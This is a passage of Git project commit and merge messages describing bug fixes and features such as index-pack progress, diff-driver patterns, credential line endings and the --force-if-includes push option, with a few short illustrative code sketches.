Otherwise, the `git for-each-ref ... | grep main` which wants to catch
those refs would also unexpectedly catch `refs/heads/main`.
Since the refs in question are worktree-local ones (i.e. each worktree
has their own, just like `HEAD`), and since the test case already uses a
secondary worktree called "second", let's use the name "first" for those
refs instead.
While at it, adjust the test titles that talk about a "repo" when they
meant a "worktree" instead.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 805d9eaf5e (Makefile: ASCII-sort += lists, 2020-03-21), the += lists
in the Makefile were sorted into ASCII order. Since then, more out of
order elements have been introduced. Sort these lists back into ASCII
order.
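For reference, "ASCII order" here means plain byte-wise comparison.
A small sketch (the helper name and sample file names are made up for
illustration) that sorts a list this way and reports the first element
that is out of order:

```python
def first_out_of_order(items):
    """Return the first element that sorts before its predecessor, or None."""
    for prev, cur in zip(items, items[1:]):
        if cur < prev:
            return cur
    return None


# For ASCII-only strings, Python's default string ordering compares
# code points, which is the same as ASCII order.
objs = ["wrapper.o", "ws.o", "write-or-die.o", "wt-status.o"]
print(first_out_of_order(objs))
print(sorted(objs))
```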
This patch is best viewed with `--color-moved`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The auto condition for the commit-graph maintenance task walks refs
looking for commits that are not in the commit-graph file. This was
added in 4ddc79b2 (maintenance: add auto condition for commit-graph
task, 2020-09-17) but was left untested.
The initial goal of this change was to demonstrate the feature works
properly by adding tests. However, there was an off-by-one error that
caused the basic tests around maintenance.commit-graph.auto=1 to fail
when it should work.
The subtlety is that if a ref tip is not in the commit-graph, then we
were not adding that to the total count. In the test, we see that we
have only added one commit since our last commit-graph write, so the
auto condition would say there is nothing to do.
The fix is simple: add the check for the commit-graph position to see
that the tip is not in the commit-graph file before starting our walk.
Since this happens before adding to the DFS stack, we do not need to
clear our (currently empty) commit list.
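A simplified model of the corrected counting is sketched below. It is
not the code in builtin/gc.c: the function name, the dictionary of
parents and the `in_graph` set are assumptions used only to show that
the tip itself is now counted before the walk starts.

```python
def count_commits_not_in_graph(tips, parents, in_graph):
    """Count commits reachable from `tips` that are missing from the graph.

    `parents` maps a commit to its parent list and `in_graph` is the set
    of commits already in the commit-graph (both hypothetical inputs).
    """
    seen = set()
    count = 0
    for tip in tips:
        # The fix: check the tip itself before starting the walk.
        if tip in in_graph or tip in seen:
            continue
        seen.add(tip)
        count += 1
        stack = [tip]
        while stack:
            commit = stack.pop()
            for parent in parents.get(commit, ()):
                if parent in in_graph or parent in seen:
                    continue
                seen.add(parent)
                count += 1
                stack.append(parent)
    return count


history = {"C": ["B"], "B": ["A"], "A": []}
print(count_commits_not_in_graph(["B"], history, {"A"}))
print(count_commits_not_in_graph(["C"], history, {"A"}))
```

With a threshold of 1, a single new commit on a ref tip is now enough
to satisfy the auto condition in this model.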
This does add some extra complexity for the test, because we also want
to verify that the walk along the parents actually does some work. This
means we need to add at least two commits in a row without writing the
commit-graph. However, we also need to make sure no additional refs are
pointing to the middle of this list or else the for_each_ref() in
should_write_commit_graph() might visit these commits as tips instead of
doing a DFS walk. Hence, the last two commits are added with "git
commit" instead of "test_commit".
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The regex used for the CSS builtin diff driver in git is only
able to show chunk headers for lines that start with a number,
a letter or an underscore.
However, the regex fails to detect classes (which start with a .), ids
(which start with a #), :root and attribute-value based selectors (for
example [class*="col-"]), as well as @-based block-level statements
like @page, @keyframes and @media, since all of them start with a
special character.
Allow the selectors and block level statements to begin with these
special characters.
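The effect can be sketched with a simplified pattern. This is an
illustration only, not the regex in userdiff.c; it models just the
"optional special first character" rule and ignores the rest of the
driver.

```python
import re

# Hypothetical pattern: an optional leading ':', '[', '@', '.' or '#',
# followed by a letter, digit or underscore.
CSS_HEADER = re.compile(r"^[:\[@.#]?[A-Za-z0-9_]")


def is_header_candidate(line):
    """Return True if `line` could serve as a hunk header in this model."""
    return CSS_HEADER.match(line) is not None


for line in [".col-1 {", "#main {", ":root {", '[class*="col-"] {',
             "@media screen {", "body {", "  color: red;", "}"]:
    print(repr(line), is_header_candidate(line))
```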
Signed-off-by: Sohom Datta <sohom.datta@learner.manipal.edu>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current behavior of git checkout/switch is that --guess is
enabled by default. However, some users may not wish for this to happen
automatically. Instead of forcing users to specify --no-guess manually
each time, teach these commands the checkout.guess configuration
variable that gives users the option to set a default behavior.
Teach the completion script to recognize the new config variable and
disable DWIM logic if it is set to false.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Improve dark mode support. Do not hard-code widget colors and instead
pull them from the current theme and update them in the options
database.
* st/dark-mode:
git-gui: improve dark mode support
When building with SKIP_DASHED_BUILT_INS=YesPlease, the built-in
commands are no longer present in the `PATH` as hardlinks to `git`.
As a consequence, `load_command_list()` needs to be taught to find the
names of the built-in commands from elsewhere.
This only affected the output of `git --list-cmds=main`, but not the
output of `git help -a` because the latter includes the built-in
commands by virtue of them being listed in command-list.txt.
The bug was detected via a patch series that turns the merge strategies
included in Git into built-in commands: `git merge -s help` relies on
`load_command_list()` to determine the list of available merge
strategies.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A comment mentions that we may free cached delta bases via
find_unresolved_deltas(), but that function went away in f08cbf60fe
(index-pack: make quantum of work smaller, 2020-09-08). Since we need to
rewrite that comment anyway, make the entire comment clearer.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The type_cas lock lost all of its callers in f08cbf60fe (index-pack:
make quantum of work smaller, 2020-09-08), so we can safely delete it.
The compiler didn't alert us that the variable became unused, because we
still call pthread_mutex_init() and pthread_mutex_destroy() on it.
It's worth considering also whether that commit was in error to remove
the use of the lock. Why don't we need it now, if we did before, as
described in ab791dd138 (index-pack: fix race condition with duplicate
bases, 2014-08-29)? I think the answer is that we now look at and assign
the child_obj->real_type field in the main thread while holding the
work_lock(). So we don't have to worry about racing with the worker
threads.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit f08cbf60fe (index-pack: make quantum of work smaller, 2020-09-08)
refactored the main loop in threaded_second_pass(), but also deleted the
call to display_progress() at the top of the loop. This means that users
typically see no progress at all during the delta resolution phase (and
for large repositories, Git appears to hang).
This looks like an accident that was unrelated to the intended change of
that commit, since we continue to update nr_resolved_deltas in
resolve_delta(). Let's restore the call to get that progress back.
We'll also add a test that confirms we generate the expected progress.
This isn't perfect, as it wouldn't catch a bug where progress was
delayed to the end. That was probably possible to trigger when receiving
a thin pack, because we'd eventually call display_progress() from
fix_unresolved_deltas(), but only once after doing all the work.
However, since our test case generates a complete pack, it reliably
demonstrates this particular bug and its fix. And we can't do better
without making the test racy.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
At the same time also deduplicate those options from command completions
which use $__git_diff_common_options.
Signed-off-by: Robert Karszniewicz <avoidr@posteo.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 554544276a (*.[ch]: remove extern from function declarations using
spatch, 2019-04-29), `extern` on function declarations was declared to
be redundant and thus removed from the codebase. An `extern` was
accidentally reintroduced in 08809c09aa (mingw: add a helper function to
attach GDB to the current process, 2020-02-13).
Remove this spurious `extern`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is the custom to follow minor updates of GitHub Actions
automatically, by using the suffix `@v1`. Actions' maintainers will then
update that `v1` ref to point to the newest.
However, for `microsoft/setup-msbuild`, 889cacb689 (ci: configure
GitHub Actions for CI/PR, 2020-04-11) uses a very specific `@v1.0.0`
suffix.
In this instance, that is a problem: should `setup-msbuild` release a
new version that intends to fix a critical bug, we won't know it, and we
won't use it.
Such a scenario is not theoretical. It is happening right now:
https://github.blog/changelog/2020-10-01-github-actions-deprecating-set-env-and-add-path-commands
Let's simplify our setup, allowing us to benefit from automatically
using the newest v1.x.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since the builtin add-p is used when $GIT_TEST_ADD_I_USE_BUILTIN is
given, we should replace the PERL prerequisite with an ADD_I
prerequisite which first checks if $GIT_TEST_ADD_I_USE_BUILTIN is
defined before checking PERL.[0] Mark this in a NEEDSWORK so that it can
be addressed at a later time.
[0]: https://lore.kernel.org/git/xmqqsgat7ttf.fsf@gitster.c.googlers.com/
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using "A...B" has been supported for the <tree-ish> argument for a
while. However, its support has never been explicitly documented.
Explicitly document it so that users know that it is available.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running `git checkout -p` with a merge-base rev results in an error:
$ git checkout -p HEAD...
usage: git diff-index [-m] [--cached] [<common-diff-options>] <tree-ish> [<path>...]
common diff options:
-z output diff-raw with lines terminated with NUL.
-p output patch format.
-u synonym for -p.
--patch-with-raw
output both a patch and the diff-raw format.
--stat show diffstat instead of patch.
--numstat show numeric diffstat instead of patch.
--patch-with-stat
output a patch and prepend its diffstat.
--name-only show only names of changed files.
--name-status show names and status of changed files.
--full-index show full object name on index lines.
--abbrev=<n> abbreviate object names in diff-tree header and diff-raw.
-R swap input file pairs.
-B detect complete rewrites.
-M detect renames.
-C detect copies.
--find-copies-harder
try unchanged files as candidate for copy detection.
-l<n> limit rename attempts up to <n> paths.
-O<file> reorder diffs according to the <file>.
-S<string> find filepair whose only one side contains the string.
--pickaxe-all
show all files diff when -S is used and hit is found.
-a --text treat all files as text.
Cannot close git diff-index --cached --numstat --summary HEAD... -- () at <redacted>/libexec/git-core/git-add--interactive line 183.
This happens because checkout passes the literal argument (in the
example, `HEAD...`) to diff-index which does not recognise merge-base
revs.
Fix this by using the hex of the found commit instead of the given name.
Note that "HEAD" is handled specially in run_add_interactive() so it's
explicitly not changed.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The modern style for Git documentation is to use backticks to quote
any command-line documentation so that it is typeset in monospace.
Replace all single quotes with backticks to conform to this.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
PHP permits functions to be defined like
final public function foo() { }
abstract protected function bar() { }
but our hunk header pattern does not recognize these decorations.
Add "final" and "abstract" to the list of function modifiers.
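A sketch of what such a pattern accepts is shown below. It is modelled
on the description above and is not copied from userdiff.c; the exact
modifier list is an assumption.

```python
import re

# Illustrative only: any number of modifiers, then the "function" keyword.
PHP_FUNC = re.compile(
    r"^[\t ]*((?:(?:public|protected|private|static|abstract|final)[\t ]+)*"
    r"function\b.*)$"
)


def hunk_header(line):
    """Return the text that would be shown as hunk header, or None."""
    m = PHP_FUNC.match(line)
    return m.group(1) if m else None


print(hunk_header("final public function foo() { }"))
print(hunk_header("    abstract protected function bar() { }"))
print(hunk_header("$x = 1;"))
```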
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Javier Spagnoletti <phansys@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The colors of some ttext widgets are hard-coded. These hard-coded colors
are okay with a light theme but with a dark theme some widgets are dark
colored and the hard-coded ones are still light. This defeats the
purpose of applying the theme and makes the UI look very awkward.
Remove the hard-coded colors in ttext calls and use colors from the
theme for those widgets via Text.Background and Text.Foreground from the
option database.
Similarly, the highlighting for the currently selected file(s) in the
"Staged Files" and "Unstaged Files" sections is also hard-coded. Pull
the colors for that from the current theme to make sure it is in line
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
On atomic push failure with GnuPG, we expect a very specific output
on stdout due to the `--porcelain` switch.
On such a failure, we also write some helpful hints to stderr
in order to help the user understand what happened and how to continue
from the failure.
On a lot of systems, those hints (on stderr) will be flushed first,
then the messages on stdout will be flushed. On such systems, the
current test code is fine as is.
However, we have no such guarantee: there are (at least) some real
systems that write those streams interleaved. On such systems, we may
see the stderr stream written in the middle of the stdout stream.
Let's split the redirection of those streams. By splitting them,
the output stream will contain exactly what we want to compare,
thus saving us a "sed" invocation.
While we're at it, change the `test_i18ncmp` to `test_cmp` because we
will never translate those messages (because of `--porcelain`).
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Loosen the parser in the receiving end of the credential protocol
to allow credential helper to terminate lines with CRLF line
ending, as well as LF line ending.
* nl/credential-crlf:
credential: treat CR/LF as line endings in the credential protocol
"git format-patch" learns to take "whenAble" as a possible value
for the format.useAutoBase configuration variable to become no-op
when the automatically computed base does not make sense.
* jk/format-auto-base-when-able:
format-patch: teach format.useAutoBase "whenAble" option
"log -c --find-object=X" did not work well to find a merge that
involves a change to an object X from only one parent.
* jk/diff-cc-oidfind-fix:
combine-diff: handle --find-object in multitree code path
"git archive" learns the "--add-file" option to include untracked
files into a snapshot from a tree-ish.
* rs/archive-add-file:
Makefile: use git-archive --add-file
archive: add --add-file
archive: read short blobs in archive.c::write_archive_entry()
The lazy fetching done internally to make missing objects available
in a partial clone incorrectly made permanent damage to the partial
clone filter in the repository, which has been corrected.
* jt/keep-partial-clone-filter-upon-lazy-fetch:
fetch: do not override partial clone filter
promisor-remote: remove unused variable
Code cleanup.
* jk/unused:
dir.c: drop unused "untracked" from treat_path_fast()
sequencer: handle ignore_footer when parsing trailers
test-advise: check argument count with argc instead of argv
sparse-checkout: fill in some options boilerplate
sequencer: drop repository argument from run_git_commit()
push: drop unused repo argument to do_push()
assert PARSE_OPT_NONEG in parse-options callbacks
env--helper: write to opt->value in parseopt helper
drop unused argc parameters
convert: drop unused crlf_action from check_global_conv_flags_eol()
Using the CMake support we added some time ago for a real Visual
Studio build revealed that a lot of usability improvements were
possible; these have been carried out.
* js/cmake-vs:
hashmap_for_each_entry(): workaround MSVC's runtime check failure #3
cmake (Windows): recommend using Visual Studio's built-in CMake support
cmake (Windows): initialize vcpkg/build dependencies automatically
cmake (Windows): complain when encountering an unknown compiler
cmake (Windows): let the `.dll` files be found when running the tests
cmake: quote the path accurately when editing `test-lib.sh`
cmake: fall back to using `vcpkg`'s `msgfmt.exe` on Windows
cmake: ensure that the `vcpkg` packages are found on Windows
cmake: do find Git for Windows' shell interpreter
cmake: ignore files generated by CMake as run in Visual Studio
Code clean-up.
* ma/worktree-cleanups:
worktree: use skip_prefix to parse target
worktree: rename copy-pasted variable
worktree: update renamed variable in comment
worktree: inline `worktree_ref()` into its only caller
wt-status: introduce wt_status_state_free_buffers()
wt-status: print to s->fp, not stdout
wt-status: replace sha1 mentions with oid
Update the tests to drop the word 'master' from them.
* js/default-branch-name-part-2:
t9902: avoid using the branch name `master`
tests: avoid variations of the `master` branch name
t3200: avoid variations of the `master` branch name
fast-export: avoid using unnecessary language in a code comment
t/test-terminal: avoid non-inclusive language
"gitk" update.
* pm/gitk-update:
gitk: Resize panes correctly when reducing window size
gitk: replace tabs with spaces
gitk: fix the context menu not appearing in the presence of submodule diffs
gitk: Un-hide selection in areas with non-default background color
gitk: add diff lines background colors
gitk: be prepared to be run in a bare repository
gitk: Preserve window dimensions on exit when not using ttk themes
gitk: don't highlight files after submodules as submodules
gitk: fix branch name encoding error
gitk: rename "commit summary" to "commit reference"
in_merge_bases_many(), a way to see if a commit is reachable from
any commit in a set of commits, was totally broken when the
commit-graph feature was in use, which has been corrected.
* ds/in-merge-bases-many-optim-bug:
commit-reach: fix in_merge_bases_many bug
`git ls-files` was never taught to respect the `submodule.recurse`
configuration variable, and it is too late now to change that [1],
but still the command is mentioned in 'gitsubmodules(7)' as if it
does respect that config.
Adjust the call in 'gitsubmodules(7)' by calling 'ls-files' with the
'--recurse-submodules' option.
While at it, uniformize the capitalization in that file, and use
backticks instead of quotes for Git commands and configuration
variables.
[1] https://lore.kernel.org/git/pull.732.git.1599707259907.gitgitgadget@gmail.com/T/#u
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A race that leads to an access to free'd data was corrected in
the codepath that reads pack files.
* mt/delta-base-cache-races:
packfile: fix memory leak in add_delta_base_cache()
packfile: fix race condition on unpack_entry()
"git shortlog" has been taught to group commits by the contents of
the trailer lines, like "Reviewed-by:", "Coauthored-by:", etc.
* jk/shortlog-group-by-trailer:
shortlog: allow multiple groups to be specified
shortlog: parse trailer idents
shortlog: rename parse_stdin_ident()
shortlog: de-duplicate trailer values
shortlog: match commit trailers with --group
trailer: add interface for iterating over commit trailers
shortlog: add grouping option
shortlog: change "author" variables to "ident"
The command line completion (in contrib/) learned that "git restore
-s <TAB>" is often followed by a refname.
* au/complete-restore-s:
completion: complete refs after 'git restore -s'
completion: use "prev" variable instead of introducing "prevword"
Rewrite of the "git bisect" script in C continues.
* mr/bisect-in-c-2:
bisect--helper: reimplement `bisect_next` and `bisect_auto_next` shell functions in C
bisect: call 'clear_commit_marks_all()' in 'bisect_next_all()'
bisect--helper: reimplement `bisect_autostart` shell function in C
bisect--helper: introduce new `write_in_file()` function
bisect--helper: use '-res' in 'cmd_bisect__helper' return
bisect--helper: BUG() in cmd_*() on invalid subcommand
"git bisect start X Y", when X and Y are not valid committish
object names, should take X and Y as pathspec, but didn't.
* cc/bisect-start-fix:
bisect: don't use invalid oid as rev when starting
"git blame --ignore-rev/--ignore-revs-file" failed to validate
that their input is a valid revision, and failed to take into account
that the user may want to give an annotated tag instead of a
commit, which has been corrected.
* jc/blame-ignore-fix:
blame: validate and peel the object names on the ignore list
t8013: minimum preparatory clean-up
Compilation fix around type punning.
* jk/drop-unaligned-loads:
Revert "fast-export: use local array to store anonymized oid"
bswap.h: drop unaligned loads
The installation procedure learned to optionally omit "git-foo"
executable files for each 'foo' built-in subcommand, which are only
required by old timers that still rely on the age old promise that
prepending "git --exec-path" output to PATH early in their script
will keep the "git-foo" calls they wrote working.
The old attempt to remove these executables from the disk failed in
the 1.6 era; it may be worth attempting again, but I think it is
worth keeping this topic separate from such a policy change to help
it graduate early.
* js/no-builtins-on-disk-option:
ci: stop linking built-ins to the dashed versions
Optionally skip linking/copying the built-ins
msvc: copy the correct `.pdb` files in the Makefile target `install`
Modernization and fixes to MediaWiki remote backend.
* ab/mediawiki-fixes:
remote-mediawiki: use "sh" to eliminate unquoted commands
remote-mediawiki: annotate unquoted uses of run_git()
remote-mediawiki: convert to quoted run_git() invocation
remote-mediawiki: provide a list form of run_git()
remote-mediawiki tests: annotate failing tests
remote-mediawiki: fix duplicate revisions being imported
remote-mediawiki tests: use CLI installer
remote-mediawiki tests: use inline PerlIO for readability
remote-mediawiki tests: replace deprecated Perl construct
remote-mediawiki tests: use a more idiomatic dispatch table
remote-mediawiki tests: use "$dir/" instead of "$dir."
remote-mediawiki tests: change `[]` to `test`
remote-mediawiki tests: use test_cmp in tests
remote-mediawiki tests: use a 10 character password
remote-mediawiki tests: use the login/password variables
remote-mediawiki doc: don't hardcode Debian PHP versions
remote-mediawiki doc: link to MediaWiki's current version
remote-mediawiki doc: correct link to GitHub project
This fix makes using Git credentials more friendly to Windows users: it
allows a credential helper to communicate using CR/LF line endings ("DOS
line endings" commonly found on Windows) instead of LF-only line endings
("Unix line endings").
Note that this changes the behavior a bit: if a credential helper
produces, say, a password with a trailing Carriage Return character,
that will now be culled even when the rest of the lines end only in Line
Feed characters, indicating that the Carriage Return was not meant to be
part of the line ending.
In practice, it seems _very_ unlikely that something like this happens.
Passwords usually need to consist of non-control characters, URLs need
to have special characters URL-encoded, and user names, well, are names.
However, it _does_ help on Windows, where CR/LF line endings are common:
as unrecognized commands are simply ignored by the credential machinery,
even a command like `quit\r` (which is clearly intended to abort) would
simply be ignored (silently) by Git.
So let's change the credential machinery to accept both CR/LF and LF
line endings.
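The accepted input can be sketched like this. It is a simplified model
and not Git's parser: the function name is made up, and the handling
of unrecognized lines is reduced to skipping them.

```python
def parse_credential_lines(data):
    """Parse key=value lines, accepting LF or CR/LF line endings.

    Hypothetical helper for illustration. Parsing stops at the first
    empty line.
    """
    result = {}
    for raw in data.split("\n"):
        # Cull a single trailing Carriage Return, if present.
        line = raw[:-1] if raw.endswith("\r") else raw
        if not line:
            break
        key, sep, value = line.partition("=")
        if not sep:
            continue  # not a key=value line; skipped in this sketch
        result[key] = value
    return result


print(parse_credential_lines("username=alice\r\npassword=s3cret\r\n\r\n"))
print(parse_credential_lines("username=alice\npassword=s3cret\n\n"))
```

Note the behavior change mentioned above: in this model a value such
as "abc\r" followed by LF is returned as "abc" even when the other
lines end in LF only.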
While we do this for the credential helper protocol, we do _not_ adjust
`git credential-cache--daemon` (which won't work on Windows, anyway,
because it requires Unix sockets) nor `git credential-store` (which
writes the file `~/.git-credentials` which we consider an implementation
detail that should be opaque to the user, read: we do expect users _not_
to edit this file manually).
Signed-off-by: Nikita Leonov <nykyta.leonov@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* paulus/master:
gitk: Resize panes correctly when reducing window size
gitk: replace tabs with spaces
gitk: fix the context menu not appearing in the presence of submodule diffs
gitk: Un-hide selection in areas with non-default background color
gitk: add diff lines background colors
gitk: be prepared to be run in a bare repository
gitk: Preserve window dimensions on exit when not using ttk themes
gitk: don't highlight files after submodules as submodules
gitk: fix branch name encoding error
gitk: rename "commit summary" to "commit reference"
Update test cases for the new option, and document its usage
and update related references.
- t/t5533-push-cas.sh:
Update test cases for "compare-and-swap" when used along with
"--force-if-includes", which helps mitigate overwrites when remote
refs are updated in the background and allows forced updates when
changes from the remote are integrated locally.
- Documentation:
Add reference for the new option, configuration setting
("push.useForceIfIncludes") and advice messages.
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit added the necessary machinery to implement the
"--force-if-includes" protection, when "--force-with-lease" is used
without giving the exact object the remote still ought to have. Surface
the feature by adding a command line option and a configuration
variable to enable it.
- Add a flag: "TRANSPORT_PUSH_FORCE_IF_INCLUDES" to indicate that the
new option was passed from the command line or via configuration
settings; update command line and configuration parsers to set the
new flag accordingly.
- Introduce a new configuration option "push.useForceIfIncludes", which
is equivalent to setting "--force-if-includes" in the command line.
- Update "remote-curl" to recognize and pass this option to "send-pack"
when enabled.
- Update "advise" to catch the reject reason "REJECT_REF_NEEDS_UPDATE",
set when the ref status is "REF_STATUS_REJECT_REMOTE_UPDATED" and
(optionally) print a help message when the push fails.
- The new option is a "no-op" in the following scenarios:
* When used without "--force-with-lease".
* When used with "--force-with-lease", and if the expected commit
on the remote side is specified as an argument.
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a check to verify if the remote-tracking ref of the local branch
is reachable from one of its "reflog" entries.
The check iterates through the local ref's reflog to see if there
is an entry for the remote-tracking ref, collecting any commits
that are seen into a list; the iteration stops if an entry in the
reflog matches the remote ref or if the entry timestamp is older
than the latest entry of the remote ref's "reflog". If there wasn't an
entry found for the remote ref, "in_merge_bases_many()" is called
to check if it is reachable from the list of collected commits.
When a local branch that is based on a remote ref, has been rewound
and is to be force pushed on the remote, "--force-if-includes" runs
a check that ensures any updates to the remote-tracking ref that may
have happened (by push from another repository) in-between the time
of the last update to the local branch (via "git-pull", for instance)
and right before the time of push, have been integrated locally
before allowing a forced update.
If the new option is passed without specifying "--force-with-lease",
or specified along with "--force-with-lease=<refname>:<expect>" it
is a "no-op".
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The resizeclistpanes and resizecdetpanes procedures attempt to keep
the horizontal proportions of the panes of the gitk window
approximately constant when the gitk window is resized. However, if
the size is reduced enough that an existing sash position would go
outside the window, Tk moves the sash to the left to keep it inside
the window (without moving other sash positions to keep the
proportions). This happens before these resize procedures get
control, and so they work with incorrect proportions.
To fix this, we record the sash positions we set previously and use
those previously-set sash positions rather than the current sash
positions when computing the proportions.
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
The source code is a mix of tabs and spaces. The indentation style
currently is four spaces per indent level but uses tabs every other
level (at eight spaces). Fix this inconsistent spacing and tabbing by
just using a space-indent for everything.
This was done mechanically by running:
$ expand -i gitk >gitk.new
$ mv gitk.new gitk
This patch should be empty with `--ignore-all-space`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Way back in f9b8908b (commit.c: use generation numbers for
in_merge_bases(), 2018-05-01), a heuristic was used to short-circuit
the in_merge_bases() walk. This works just fine as long as the
caller is checking only two commits, but when there are multiple,
there is a possibility that this heuristic is _very wrong_.
Some code moves since then have changed this method to
repo_in_merge_bases_many() inside commit-reach.c. The heuristic
computes the minimum generation number of the "reference" list, then
compares this number to the generation number of the "commit".
In a recent topic, a test was added that used in_merge_bases_many()
to test if a commit was reachable from a number of commits pulled
from a reflog. However, this highlighted the problem: if any of the
reference commits have a smaller generation number than the given
commit, then the walk is skipped _even if there exist some with
higher generation number_.
This heuristic is wrong! It must check the MAXIMUM generation number
of the reference commits, not the MINIMUM.
This highlights a testing gap. t6600-test-reach.sh covers many
methods in commit-reach.c, including in_merge_bases() and
get_merge_bases_many(), but since these methods either restrict to
two input commits or actually look for the full list of merge bases,
they don't check this heuristic!
Add a possible input to "test-tool reach" that tests
in_merge_bases_many() and add tests to t6600-test-reach.sh that
cover this heuristic. This includes cases for the reference commits
having generation above and below the generation of the input commit,
but also having maximum generation below the generation of the input
commit.
The fix itself is to swap min_generation with a max_generation in
repo_in_merge_bases_many().
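To make the difference between the two cutoffs concrete, here is a simplified sketch in C. The function can_skip_walk() and its plain integer arguments are illustrative assumptions; the real code works on commit objects and has special generation values that this sketch ignores.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Simplified model (hypothetical names): a commit can only be reachable
 * from a reference whose generation number is at least as large as its
 * own. The walk may therefore be skipped only when the commit's
 * generation exceeds the MAXIMUM generation among the references.
 */
int can_skip_walk(uint32_t commit_gen, const uint32_t *ref_gens, size_t nr)
{
	uint32_t max_gen = 0;
	size_t i;

	assert(ref_gens != NULL || nr == 0);
	for (i = 0; i < nr; i++)
		if (ref_gens[i] > max_gen)
			max_gen = ref_gens[i];
	return commit_gen > max_gen;
}
```

For a commit at generation 5 and references at generations 3 and 10, this returns 0, so the walk still happens. A cutoff based on the minimum (3) would have skipped the walk even though the reference at generation 10 may reach the commit.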
Reported-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The format.useAutoBase configuration option exists to allow users to
enable '--base=auto' for format-patch by default.
This can sometimes lead to poor workflow, due to unexpected failures
when attempting to format an ancient patch:
$ git format-patch -1 <an old commit>
fatal: base commit shouldn't be in revision list
This can be very confusing, as it is not necessarily immediately obvious
that the user requested a --base (since this was in the configuration,
not on the command line).
We do want --base=auto to fail when it cannot provide a suitable base,
as it would be equally confusing if a formatted patch did not include
the base information when it was requested.
Teach format.useAutoBase a new mode, "whenAble". This mode will cause
format-patch to attempt to include a base commit when it can. However,
if no valid base commit can be found, then format-patch will continue
formatting the patch without a base commit.
In order to avoid making yet another branch name unusable with --base,
do not teach --base=whenAble or --base=whenable.
Instead, refactor the base_commit option to use a callback, and rely on
the global configuration variable auto_base.
This does mean that a user cannot request this optional base commit
generation from the command line. However, this is likely not too
valuable. If the user requests base information manually, they will be
immediately informed of the failure to acquire a suitable base commit.
This allows the user to make an informed choice about whether to
continue the format.
Add tests to cover the new mode of operation for --base.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commands such as
$ git pull --rebase --recurse-submodules --quiet
produce non-quiet output from the merge or rebase. Pass the --quiet
option down when invoking "rebase" and "merge".
Also fix the parsing of git submodule update -v.
When e84c3cf3 (git-submodule.sh: accept verbose flag in cmd_update
to be non-quiet, 2018-08-14) taught "git submodule update" to take
"--quiet", it apparently did not know how ${GIT_QUIET:+--quiet}
works, and reviewers seem to have missed that setting the variable
to "0", rather than unsetting it, still results in "--quiet" being
passed to underlying commands.
Signed-off-by: Theodore Dubois <tbodt@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While the default remote name of "origin" can be changed at clone-time
with `git clone`'s `--origin` option, it was previously not possible
to specify a default value for the name of that remote. Add support for
a new `clone.defaultRemoteName` config, with the newly-created remote
name resolved in priority order:
1. (Highest priority) A remote name passed directly to `git clone -o`
2. A `clone.defaultRemoteName=new_name` config passed via `git clone -c`
3. A `clone.defaultRemoteName` value set in `/path/to/template/config`,
where `--template=/path/to/template` is provided
4. A `clone.defaultRemoteName` value set in a non-template config file
5. The default value of `origin`
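The priority order above can be sketched in C as follows. This is only an illustration: resolve_remote_name() is a hypothetical function, and it assumes that items 2 to 4 have already been collapsed into a single value by the config machinery (NULL when unset).

```c
#include <assert.h>
#include <stddef.h>

/*
 * Hypothetical sketch: start from the built-in default, let the config
 * value replace it, then let the command-line option replace that.
 * Callers are assumed to pass NULL (not "") for "not given".
 */
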